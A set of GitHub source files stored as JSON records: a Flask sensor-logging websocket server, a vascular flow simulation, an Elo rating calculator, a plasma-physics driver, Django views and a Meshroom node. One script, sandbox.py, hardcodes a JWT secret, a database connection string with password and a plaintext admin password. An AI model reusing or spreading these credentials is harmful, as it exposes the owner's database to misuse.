\nfrom flask_sockets import Sockets\nimport sys\nimport os\n\napp = Flask(__name__) \nsockets = Sockets(app)\nif sys.argv[1]:\n\tDIR = \"./data/\" + sys.argv[1] + \"/\"\n\tif not os.path.exists(DIR):\n\t\tos.mkdir(DIR)\nelse:\n\tDIR = \"\"\n\n\n@sockets.route('/accelerometer') \ndef echo_socket(ws):\n\tf=open(DIR+\"accelerometer.txt\",\"a\")\n\twhile True: \n\t\tmessage = ws.receive()\n\t\t# print(message) \n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n\n@sockets.route('/gyroscope')\ndef echo_socket(ws):\n\tf=open(DIR+\"gyroscope.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\t\n@sockets.route('/magnetometer')\ndef echo_socket(ws):\n\tf=open(DIR+\"magnetometer.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/orientation')\ndef echo_socket(ws):\n\tf=open(DIR+\"orientation.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/stepcounter')\ndef echo_socket(ws):\n\tf=open(DIR+\"stepcounter.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/thermometer')\ndef echo_socket(ws):\n\tf=open(DIR+\"thermometer.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/lightsensor')\ndef echo_socket(ws):\n\tf=open(DIR+\"lightsensor.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/proximity')\ndef echo_socket(ws):\n\tf=open(DIR+\"proximity.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/geolocation')\ndef echo_socket(ws):\n\tf=open(DIR+\"geolocation.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n\t\n\n@app.route('/') \ndef hello(): \n\treturn 'Hello World!'\n\nif __name__ == \"__main__\":\n\tfrom gevent import pywsgi\n\tfrom geventwebsocket.handler import WebSocketHandler\n\tserver = pywsgi.WSGIServer(('0.0.0.0', 5000), app, handler_class=WebSocketHandler)\n\tserver.serve_forever()\n","repo_name":"DedZago/msbd","sub_path":"PhonePi/PhonePiPython3.py","file_name":"PhonePiPython3.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13447310481","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nimport scipy.sparse as spr\r\nimport scipy.sparse.linalg as sprlin\r\nimport triangular_net as Tr\r\nimport draw_net as Dr\r\nimport delaunay as De\r\nfrom collections import defaultdict\r\nfrom geometry import set_geometry\r\nimport time\r\n\r\n#================= WARUNKI POCZĄTKOWE i STAŁE ========================================================================\r\n\r\nn = 401 # rozmiar siatki\r\nnkw=n**2\r\n\r\nlength_wiggle_param = 1\r\ndiameter_wiggle_param = 3\r\n\r\nSPARSE = 1 # 1 = twórz macierz rzadką, 0 = twórz zwykłą macierz\r\n\r\nqin = 10 # ilosć wpływającej krwi\r\npresout = 0 # cisnienie na wyjsciu\r\nmu = 0.0035 # współczynnik lepkosci\r\nl = 1 # początkowa długosć krawędzi\r\nc1 = np.pi / (128 * mu) # stała przepływu\r\nc2 = 64 * mu / (np.pi) # stała siły\r\n\r\nF0=0.2\r\nF1=1\r\nz0=0\r\nz1=1\r\nF_mult = 10000\r\ndt = 0.8\r\n\r\niters = 301 # liczba iteracji\r\ndivide = 10\r\n\r\n#================= FUNKCJE WSPÓLNE DLA KAŻDEJ GEOMETRII ==============================================================\r\n\r\ndef create_matrix(G, SPARSE=0):\r\n\r\n data, row, col = [], [], []\r\n\r\n diag = np.zeros(n * n)\r\n for n1, n2, d, l in reg_reg_edges:\r\n res = c1 * d ** 4 / l\r\n data.append(res)\r\n row.append(n1)\r\n col.append(n2)\r\n data.append(res)\r\n row.append(n2)\r\n col.append(n1)\r\n diag[n1] -= res\r\n diag[n2] -= res\r\n for n1, n2, d, l in reg_something_edges:\r\n res = c1 * d ** 4 / l\r\n data.append(res)\r\n row.append(n1)\r\n col.append(n2)\r\n diag[n1] -= res\r\n\r\n for node, datum in enumerate(diag):\r\n if datum != 0:\r\n row.append(node)\r\n col.append(node)\r\n data.append(datum)\r\n\r\n for node in out_nodes:\r\n row.append(node)\r\n col.append(node)\r\n data.append(1)\r\n\r\n insert = defaultdict(float)\r\n for n1, n2, d, l in in_edges:\r\n insert[n2] += c1 * d**4 / l\r\n\r\n sum_insert = sum(insert.values())\r\n\r\n for node in in_nodes:\r\n data.append(-sum_insert)\r\n row.append(node)\r\n col.append(node)\r\n\r\n for ins_node, ins in insert.items():\r\n data.append(ins)\r\n row.append(node)\r\n col.append(ins_node)\r\n\r\n # posortujmy teraz dane tak, aby były najpierw po row, potem po column\r\n #to_sort = list(zip(data, row, col))\r\n #to_sort = sorted(to_sort, key=lambda elem: elem[1] * nkw + elem[2])\r\n #data, row, col = zip(*to_sort)\r\n\r\n return spr.csr_matrix((data, (row, col)), shape=(n * n, n * n))\r\n\r\n\r\ndef solve_equation_for_pressure(matrix, presult):\r\n \"\"\"\r\n Zamieniamy macierz w równaniu na formę macierzy rzadkiej\r\n w celu usprawnienia obliczeń\r\n \"\"\"\r\n if (SPARSE == 0): pnow = sprlin.spsolve(spr.csc_matrix(matrix), presult)\r\n elif (SPARSE == 1): pnow = sprlin.spsolve(matrix, presult)\r\n\r\n return pnow\r\n\r\ndef update_graph(pnow, reg_reg_edges, reg_something_edges, in_edges):\r\n def d_update(F):\r\n #zmiana średnicy pod względem siły F\r\n result = 0\r\n if (F > F0):\r\n if (F < F1):\r\n result = z0+(F-F0)*(z1-z0)/(F1-F0)\r\n else:\r\n result = z1\r\n else:\r\n result = z0\r\n return result * dt\r\n\r\n\r\n reg_reg_edges2, reg_something_edges2, in_edges2=[], [], []\r\n for n1, n2, d, l in reg_reg_edges:\r\n F=F_mult*c1 * c2 * d * np.abs(pnow[n1] - pnow[n2]) / l\r\n dnew=d+d_update(F)\r\n reg_reg_edges2.append((n1, n2, dnew, l))\r\n\r\n for n1, n2, d, l in reg_something_edges:\r\n F=F_mult*c1 * c2 * d * np.abs(pnow[n1] - pnow[n2]) / l\r\n dnew=d+d_update(F)\r\n reg_something_edges2.append((n1, n2, dnew, l))\r\n for n1, n2, d, l in in_edges:\r\n F=F_mult*c1 * c2 * d * np.abs(pnow[n1] - pnow[n2]) / l\r\n dnew=d+d_update(F)\r\n in_edges2.append((n1, n2, dnew, l))\r\n\r\n return reg_reg_edges2, reg_something_edges2, in_edges2\r\n\r\ndef create_pressure_flow_vector(G, n, qin=1, presout=0):\r\n global in_nodes, out_nodes\r\n presult = np.zeros(n * n)\r\n for node in in_nodes:\r\n presult[node] = -qin\r\n for node in out_nodes:\r\n presult[node] = presout\r\n return presult\r\n\r\ndef update_matrix():\r\n global in_nodes, out_nodes, reg_nodes, in_edges\r\n data, row, col = [], [], []\r\n\r\n diag = np.zeros(n * n)\r\n for n1, n2, d, l in reg_reg_edges:\r\n res = c1 * d ** 4 / l\r\n data.append(res)\r\n row.append(n1)\r\n col.append(n2)\r\n data.append(res)\r\n row.append(n2)\r\n col.append(n1)\r\n diag[n1] -= res\r\n diag[n2] -= res\r\n for n1, n2, d, l in reg_something_edges:\r\n res = c1 * d ** 4 / l\r\n data.append(res)\r\n row.append(n1)\r\n col.append(n2)\r\n diag[n1] -= res\r\n for node, datum in enumerate(diag):\r\n if datum != 0:\r\n row.append(node)\r\n col.append(node)\r\n data.append(datum)\r\n for node in out_nodes:\r\n row.append(node)\r\n col.append(node)\r\n data.append(1)\r\n\r\n insert = defaultdict(float)\r\n for n1, n2, d, l in in_edges:\r\n insert[n2] += c1 * d ** 4 / l\r\n sum_insert = sum(insert.values())\r\n\r\n for node in in_nodes:\r\n data.append(-sum_insert)\r\n row.append(node)\r\n col.append(node)\r\n\r\n for ins_node, ins in insert.items():\r\n data.append(ins)\r\n row.append(node)\r\n col.append(ins_node)\r\n\r\n return spr.csr_matrix((data, (row, col)), shape=(nkw, nkw))\r\n\r\ndef equidistant_geometry(R, xrange, yrange, how_many):\r\n id_center = De.find_center_node(G, n, xrange=xrange, yrange=yrange)\r\n\r\n def r_squared(node):\r\n # x0, y0 = G.nodes[n*n//2][\"pos\"]\r\n x0, y0 = G.nodes[id_center]['pos']\r\n x, y = G.nodes[node]['pos']\r\n r_sqr = (x - x0) ** 2 + (y - y0) ** 2\r\n return r_sqr\r\n\r\n boundary_nodes = []\r\n for (n1, n2) in G.edges():\r\n r1, r2 = r_squared(n1), r_squared(n2)\r\n if r1 > r2:\r\n n1, n2 = n2, n1\r\n r1, r2 = r2, r1\r\n\r\n n_b = n2\r\n\r\n if r2 >= R ** 2 and r1 <= R ** 2:\r\n # x, y = G.nodes[n_b]['pos'][0] - G.nodes[n**2 // 2]['pos'][0], G.nodes[n_b]['pos'][1] - G.nodes[n**2 // 2]['pos'][1]\r\n x, y = G.nodes[n_b]['pos'][0] - G.nodes[id_center]['pos'][0], G.nodes[n_b]['pos'][1] - \\\r\n G.nodes[id_center]['pos'][1]\r\n\r\n if x == 0: x = 0.000001\r\n if y == 0: y = 0.000001\r\n\r\n if (x >= 0 and y >= 0):\r\n fi = np.arctan(y / x)\r\n elif (x < 0 and y >= 0):\r\n fi = np.pi / 2 + np.arctan(-x / y)\r\n elif (x < 0 and y < 0):\r\n fi = np.pi + np.arctan(y / x)\r\n else:\r\n fi = (3 / 2) * np.pi + np.arctan(x / -y)\r\n boundary_nodes.append([n_b, fi])\r\n boundary_nodes.sort(key=lambda node: node[1])\r\n\r\n boundary_nodes, fis = zip(*boundary_nodes)\r\n\r\n num_of_out_nodes = how_many\r\n out_indexes = np.round(np.linspace(0, len(boundary_nodes) - 1, num_of_out_nodes + 1)).astype(int)\r\n out_nodes = list(np.array(boundary_nodes)[out_indexes[:-1]])\r\n in_nodes = [id_center]\r\n\r\n return in_nodes, out_nodes\r\n\r\n\r\n#================= GRAF I GEOMETRIA ==================================================================================\r\n\r\nG = De.Build_delaunay_net(n, diameter_wiggle_param=diameter_wiggle_param)\r\n#G = Tr.Build_triangular_net(n, length_wiggle_param=length_wiggle_param, diameter_wiggle_param=diameter_wiggle_param)\r\n\r\n#nx.write_edgelist(G,'test.edgelist',data=['d'])\r\n#example_graph = nx.read_edgelist('test.edgelist', nodetype=int, data=(('d', float),))\r\n# wczytaj zapisane srednice\r\n#for n1, n2 in G.edges():\r\n# G[n1][n2]['d'] = example_graph[n1][n2]['d']\r\n\r\n\r\n#in_nodes, out_nodes = equidistant_geometry(R = n//2.5, xrange = n, yrange = n, how_many = 100)\r\n\r\n#in_nodes, out_nodes, reg_nodes, in_edges = set_geometry(n, G, geo='cylindrical', R=n//2.5)\r\nin_nodes, out_nodes, reg_nodes, in_edges = set_geometry(n, G, geo='donut', R=n//2.5, R_s=n//20)\r\n#in_nodes, out_nodes, reg_nodes, in_edges = set_geometry(n, G, geo='rect')\r\n#in_nodes, out_nodes, reg_nodes, in_edges = set_geometry(n, G, geo='own', in_nodes=in_nodes, out_nodes=out_nodes)\r\n\r\n\r\nreg_reg_edges, reg_something_edges = [], []\r\nfor n1, n2 in G.edges():\r\n d = G[n1][n2]['d']\r\n l = G[n1][n2]['length']\r\n if (n1 not in in_nodes and n1 not in out_nodes) and (n2 not in in_nodes and n2 not in out_nodes):\r\n reg_reg_edges.append((n1, n2, d, l))\r\n elif (n1 not in in_nodes and n1 not in out_nodes):\r\n reg_something_edges.append((n1, n2, d, l))\r\n elif (n2 not in in_nodes and n2 not in out_nodes):\r\n reg_something_edges.append((n2, n1, d, l ))\r\n\r\n#================= PROGRAM WŁAŚCIWY ==================================================================================\r\n\r\npresult = create_pressure_flow_vector(G, n, qin, presout)\r\n#matrix = create_matrix(G, SPARSE=SPARSE)\r\n#if SPARSE: indices, indptr = matrix.indices, matrix.indptr\r\n\r\nfor i in range(iters):\r\n print(f'Iter {i + 1}/{iters}')\r\n t1 = time.time()\r\n matrix = update_matrix()\r\n t2 = time.time()\r\n pnow = solve_equation_for_pressure(matrix, presult)\r\n t3 = time.time()\r\n if i%((iters-1)//divide) == 0:\r\n Q_in = 0\r\n Q_out = 0\r\n for n1, n2, d, l in reg_reg_edges:\r\n G[n1][n2]['d']=d\r\n q=c1 * d ** 4 * np.abs(pnow[n1] - pnow[n2]) / l\r\n G[n1][n2]['q']=q\r\n\r\n for n1, n2, d, l in reg_something_edges: \r\n G[n1][n2]['d']=d\r\n q=c1 * d ** 4 * np.abs(pnow[n1] - pnow[n2]) / l\r\n G[n1][n2]['q']=q\r\n \r\n if n2 in in_nodes:\r\n Q_in+=q\r\n if n2 in out_nodes:\r\n Q_out+=q\r\n \r\n print('Q_in =', Q_in, 'Q_out =', Q_out)\r\n \r\n Dr.drawq(G, n, f'c{i//((iters-1)//divide):04d}.png', in_nodes=in_nodes, out_nodes=out_nodes)\r\n t4 = time.time()\r\n reg_reg_edges, reg_something_edges, in_edges=update_graph(pnow, reg_reg_edges, reg_something_edges, in_edges)\r\n t5 = time.time()\r\n\r\n print('Update matrix\\t', t2-t1)\r\n print('Solve equation\\t', t3-t2)\r\n print('Update graph\\t', t5-t4)\r\n\r\n#for n1, n2 in G.edges():\r\n# print(n1, n2, G[n1][n2]['q'])","repo_name":"karol-lukanowski/symulacja-krwi","sub_path":"inne/old_main.py","file_name":"old_main.py","file_ext":"py","file_size_in_byte":10414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71620630132","text":"# Fonction pour générer un jeton JWT valide pour l'utilisateur donné\nimport psycopg2 as psy\nimport jwt\nfrom datetime import datetime, timedelta\nimport security\n\n# Clé secrète pour signer les jetons JWT\nSECRET_KEY = \"jesuisunefougere974\"\n\n# Durée de validité du jeton (nous utilisons timedelta pour que nous puissions facilement ajouter ou soustraire du temps)\nTOKEN_EXPIRATION_TIME = timedelta(days=7)\n\n\ndef set_connection():\n connection = psy.connect('postgres://testneon33:dfkFh5jcr1Tw@ep-hidden-forest-997741.eu-central-1.aws.neon.tech/neondb')\n connection.set_session(autocommit=True)\n cursor = connection.cursor()\n return connection, cursor\n\n\ndef generate_token(username: str) -> str:\n # Définir la date d'expiration du jeton\n expiration = datetime.utcnow() + TOKEN_EXPIRATION_TIME\n\n # Créer la charge utile pour le jeton JWT (nous incluons le nom d'utilisateur et la date d'expiration)\n payload = {\"sub\": username, \"exp\": expiration}\n\n # Créer le jeton JWT en signant la charge utile avec la clé secrète\n token = jwt.encode(payload, SECRET_KEY, algorithm=\"HS256\")\n\n # Retourner le jeton en tant que chaîne de caractères\n return token\n\n\n\ndef insert_admin_user(username, pwd, role):\n connection, cursor = set_connection()\n token = generate_token(\"mulder974\")\n pwd = security.hash_pwd(pwd)\n user = (username, pwd, role, token, datetime.now())\n print(user)\n print(\"trying to insert\")\n cursor.execute(\n \"\"\"\n INSERT INTO Users (username, pwd, user_role, user_token, create_at)\n VALUES (%s, %s, %s, %s, %s)\n \"\"\",\n user\n )\n print(\"inserted\")\n\n connection.close()\n\n\n\ndef select_all_users():\n connection, cursor = set_connection()\n\n cursor.execute(\"\"\"SELECT * FROM Users\"\"\", )\n\n result = cursor.fetchall()\n connection.close()\n\n return result\n\ninsert_admin_user(\"mulder974\",\"tiTeuf145*\",\"1\")\n\nprint(select_all_users())","repo_name":"hugofgry/utils","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10803422288","text":"import pandas as pd\nimport numpy as np\nimport japanize_matplotlib\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\ndef win_rate(Ra,Rb):\n return 1/(10**((Rb-Ra)/400)+1)\n\nclass elo_calc:\n def __init__(self,player: pd.DataFrame, result: pd.DataFrame):\n self.C=32.0\n self.speed=2\n self.player = player\n self.player = self.player.set_index('name')\n self.result = result\n #self.result_sheet\n self.player['elo']=1500.0\n self.history = self.player['elo']\n self.N = len(self.result.index)\n\n def debug(self):\n print(self.player)\n print(self.result)\n print(win_rate(1700,1500))\n\n def fit(self):\n for i in range(self.result.shape[0]):\n winner=self.result.at[i,'win']\n loser=self.result.at[i,'lose']\n delta_rate=self.C*win_rate(self.player.at[loser,'elo'],self.player.at[winner,'elo'])\n #print(delta_rate)\n self.player.at[winner,'elo']+=delta_rate\n self.player.at[loser,'elo']-=delta_rate\n #self.history = pd.concat([self.history,self.player['elo']],axis=1)\n if self.speed*i/self.N > 1/self.C:\n self.const_step()\n #print(self.player)\n #print(self.history)\n\n def fit2(self):\n player_list=self.player.index.tolist()\n #print(player_list)\n result_sheet=pd.DataFrame(index=player_list,columns=player_list)\n result_sheet.fillna(1, inplace=True)\n for i in range(len(self.result)):\n result_sheet[self.result['win'][i]][self.result['lose'][i]]+=1\n p=pd.Series([1.0]*len(player_list),index=player_list)\n p_n=pd.Series([1.0]*len(player_list),index=player_list)\n for _ in range(30):\n for i in range(len(p)):\n division=0.0\n for j in range(len(p)):\n if i != j:\n #print('i={},j={}'.format(i,j))\n #print(result_sheet[player_list[i]][player_list[j]])\n division += (result_sheet[player_list[i]][player_list[j]]+result_sheet[player_list[j]][player_list[i]])/(p[player_list[i]]+p[player_list[j]])\n p_n[i]=result_sheet[player_list[i]].sum()/division\n p_n = p_n/p_n.sum()\n p=p_n\n elo_raw=400*np.log10(p_n)\n self.player['elo']=1500+elo_raw-elo_raw.mean()\n def const_step(self):\n self.C/=2\n #print(self.C)\n def save_rating(self,save_dir):\n self.player.to_csv(save_dir)\n def save_move(self,save_dir):\n self.history.T.reset_index(drop=True).plot()\n plt.savefig(save_dir)\n","repo_name":"kento-libra/tera_elo_rating","sub_path":"elo_calc.py","file_name":"elo_calc.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6309976437","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n\nimport sys\nfrom GT3.IOL import IOL\nfrom GT3.SOL import Sol\nfrom GT3.ReadInFIle import ReadInfile\nfrom GT3.ImpRadiation import ImpRad\nfrom GT3.Core import Core\nfrom GT3.BeamDeposition import BeamDeposition\nfrom GT3.DensityLimit import DensityLimit\nfrom GT3.Marfe import Marfe\nfrom GT3.RadialTransport import RadialTransport\n\ntry:\n from GT3.Neutrals import Neutrals\nexcept ImportError:\n pass\nexcept ModuleNotFoundError:\n pass\n\nclass gt3:\n\n def __init__(self, inputFile=None, preparedInput = None, mode=\"coreonly\", **kwargs):\n sys.dont_write_bytecode = True\n # Create shotlabel as an attribute of plasma class\n if \"iolFlag\" in kwargs:\n iolFlag = kwargs['iolFlag']\n else:\n iolFlag = True\n if \"neutFlag\" in kwargs:\n neutFlag = kwargs['neutFlag']\n else:\n neutFlag = True\n if \"verbose\" in kwargs:\n verbose = kwargs['verbose']\n else:\n verbose = False\n if inputFile:\n self.inputFile = inputFile\n if preparedInput:\n self.inp = preparedInput\n else:\n self.inp = ReadInfile(self.inputFile)\n self.core = Core(self.inp)\n self.iolFlag = iolFlag\n self.neutFlag = neutFlag\n self.verbose = verbose\n self.beamPowerFracOverride = None\n self.ntrl_cpu_override = False\n\n try:\n import neutpy\n self.neutpyLoaded = True\n except ModuleNotFoundError:\n self.neutpyLoaded = False\n except ImportError:\n self.neutpyLoaded = False\n\n if mode == 'coreonly':\n pass\n\n\n if mode == 'coreandsol':\n self.sol = Sol(self.inp, self.core)\n elif mode == 'thermaliol':\n self.iol = IOL(self.inp, self.core)\n elif mode == 'fulliol':\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n elif mode == 'imp':\n self.imp = ImpRad(core=self.core)\n elif mode == 'ntrls':\n self._run_neutpy()\n elif mode == 'ntrlsandiol':\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n self._run_neutpy()\n elif mode == 'nbi':\n if self.iolFlag:\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n elif mode == 'marfe_denlim':\n if self.iolFlag:\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n self._run_neutpy()\n self.imp = ImpRad(core=self.core)\n self.dl = DensityLimit(self.core, self.nbi)\n self.mar = Marfe(core=self.core)\n elif mode == 'marfe':\n if self.iolFlag:\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n self._run_neutpy()\n self.imp = ImpRad(core=self.core)\n self.mar = Marfe(core=self.core)\n elif mode == 'allthethings':\n if self.iolFlag:\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n self._run_neutpy()\n self.imp = ImpRad(core=self.core)\n self.dl = DensityLimit(self.core, self.nbi)\n self.mar = Marfe(self.inp, self.core, self.imp)\n elif mode == 'radialtrans':\n if self.iolFlag:\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n self.sol = Sol(self.inp, self.core)\n self._run_neutpy()\n self.imp = ImpRad(z=None, core=self.core)\n self.rtrans = RadialTransport(self.core, self.iol, self.nbi, self.iolFlag, self.neutFlag)\n\n def _run_neutpy(self, reRun=False):\n if self.neutpyLoaded:\n self.ntrl = Neutrals(self.inp, self.core, cpus=self.ntrl_cpu_override)\n if reRun:\n self.ntrl.reRun(cpus=self.ntrl_cpu_override)\n else:\n print(\"NeutPy is not loaded. Cannot run Neutrals calculation\")\n\n\n def override_NBI_Pwrfrac(self, frac):\n if isinstance(frac, list):\n self.beamPowerFracOverride = frac\n else:\n print(\"Please provide the NBI power fraction override as a list\")\n\n def run_SOL(self):\n self.sol = Sol(self.inp, self.core)\n return self\n\n def run_IOL(self):\n self.iol = IOL(self.inp, self.core)\n return self\n\n def run_NBI(self, reRun=False):\n try:\n self.iol\n except AttributeError:\n print (\"IOL module not run. Running now...\")\n self.run_IOL()\n if self.iolFlag:\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, reRun=reRun,\n pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n return self\n\n def run_impurities(self):\n self.imp = ImpRad(core=self.core)\n return self\n\n def run_neutrals(self, reRun=False):\n self._run_neutpy(reRun=reRun)\n return self\n\n def override_ntrl_cpus(self, num):\n self.ntrl_cpu_override = num\n return self\n\n def run_density_limit(self):\n if self.iolFlag:\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n self.dl = DensityLimit(self.core, self.nbi)\n return self\n\n def run_marf(self):\n self.mar = Marfe(self.inp, self.core)\n return self\n\n def run_radial_transport(self, nbiReRun=False, ntrlReRun=False):\n try:\n self.iol\n except AttributeError:\n print (\"IOL module not run. Running now...\")\n self.run_IOL()\n try:\n self.nbi\n except AttributeError:\n print (\"NBI module not run. Running now...\")\n self.run_NBI(reRun=nbiReRun)\n\n try:\n self.imp\n except AttributeError:\n print (\"Impurity radiation module not run. Running now...\")\n self.imp = ImpRad(z=6, core=self.core)\n\n try:\n self.ntrl\n except AttributeError:\n print (\"Neutrals module not run. Running now...\")\n self.run_neutrals(reRun=ntrlReRun)\n\n\n self.rtrans = RadialTransport(self.core, self.iol, self.nbi, self.iolFlag, self.neutFlag)\n return self\n\n def disable_IOL(self):\n self.iolFlag = False\n print (\"Re-running Radial Transport without IOL\")\n try:\n self.rtrans\n except:\n self.run_radial_transport()\n return self\n\n def disable_neutrals(self):\n self.neutFlag = False\n print (\"Running Radial Transport without neutral particles\")\n try:\n self.rtrans\n except:\n self.run_radial_transport()\n return self","repo_name":"gt-frc/gt3","sub_path":"GT3/gt3.py","file_name":"gt3.py","file_ext":"py","file_size_in_byte":8244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42605524958","text":"import logging\n\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import IntegrityError\nfrom django.shortcuts import redirect, render\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import View\nfrom service_objects.errors import InvalidInputsError\n\nfrom .forms import AddShiftForm, AddTaskForm\nfrom .models import Manager, Member, Priority, Shift, Status\nfrom .services import AddShift, AddTask, GetShift, GetShifts\n\nlogger = logging.getLogger(__name__)\n\n\n@login_required\ndef index(request):\n \"\"\"\n Show list of shifts\n \"\"\"\n shifts = GetShifts.execute({}, user=request.user)\n return render(\n request,\n \"shifts/index.html\",\n {\n \"page_title\": \"Shifts\",\n \"past_shifts\": shifts.get(\"past_shifts\"),\n \"upcoming_shifts\": shifts.get(\"upcoming_shifts\"),\n \"ongoing_shift\": shifts.get(\"ongoing_shift\"),\n \"managers\": Manager.objects.select_related(\"user\").all(),\n \"members\": Member.objects.select_related(\"user\").all(),\n },\n )\n\n\n@login_required\ndef create(request):\n \"\"\"\n Create new shift\n \"\"\"\n form = AddShiftForm(request.POST)\n try:\n if form.is_valid():\n shift = AddShift.execute(request.POST)\n\n messages.success(request, \"Shift added successfully\")\n logger.info(f\"Shift added successfully. id: {shift.id}\")\n else:\n messages.error(request, \"Issue with items entered. Check and try again.\")\n except IntegrityError:\n messages.error(request, \"Date already exists\")\n logger.error(\"Date already exists\", exc_info=True)\n finally:\n return redirect(\"shifts:index\")\n\n\n@login_required\ndef detail(request, uuid):\n \"\"\"\n Display details of shift\n \"\"\"\n\n try:\n\n shift = GetShift.execute({\"uuid\": uuid}, user=request.user)\n\n if not shift:\n messages.error(\n request,\n \"Could not find shift for id provided\",\n extra_tags=\"alert-important\",\n )\n return redirect(\"shifts:index\")\n\n except InvalidInputsError as e:\n\n messages.error(\n request,\n f\"Invalid shift id: {e.errors.get('uuid').as_text()}\",\n extra_tags=\"alert-important\",\n )\n return redirect(\"shifts:index\")\n\n return render(\n request,\n \"shifts/detail.html\",\n {\n \"page_title\": \"Shift Details\",\n \"shift\": shift[\"shift\"],\n \"shift_tasks\": shift[\"shift_tasks\"],\n \"member_tasks\": shift[\"member_tasks\"],\n \"groups_data\": shift[\"groups_data\"],\n \"timeline_data\": shift[\"timeline_data\"],\n \"priorities\": Priority.objects.all(),\n \"statuses\": Status.objects.all(),\n },\n )\n\n\n@method_decorator(login_required, name=\"dispatch\")\nclass TaskView(View):\n def post(self, request):\n suuid = request.POST.get(\"uuid\")\n form = AddTaskForm(request.POST, suuid=suuid)\n shift = Shift.objects.get(uuid=suuid)\n\n if form.is_valid():\n task = AddTask.execute(request.POST, suuid=request.POST.get(\"uuid\"))\n\n messages.success(request, \"Task added successfully\")\n logger.info(f\"Task added successfully. id: {task.id}\")\n else:\n messages.error(\n request,\n f\"Issue with items entered. Check and try again.\",\n extra_tags=\"alert-important\",\n )\n\n return redirect(shift)\n","repo_name":"taiyeoguns/shiftmgr-django","sub_path":"shifts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18408181413","text":"__version__ = \"1.1\"\n\nfrom meshroom.core import desc\n\nimport os.path\n\n\nclass PanoramaPrepareImages(desc.AVCommandLineNode):\n commandLine = 'aliceVision_panoramaPrepareImages {allParams}'\n size = desc.DynamicNodeSize('input')\n\n category = 'Panorama HDR'\n documentation = '''\nPrepare images for Panorama pipeline: ensures that images orientations are coherent.\n'''\n\n inputs = [\n desc.File(\n name=\"input\",\n label=\"Input\",\n description=\"SfMData file.\",\n value=\"\",\n uid=[0],\n ),\n desc.ChoiceParam(\n name=\"verboseLevel\",\n label=\"Verbose Level\",\n description=\"Verbosity level (fatal, error, warning, info, debug, trace).\",\n 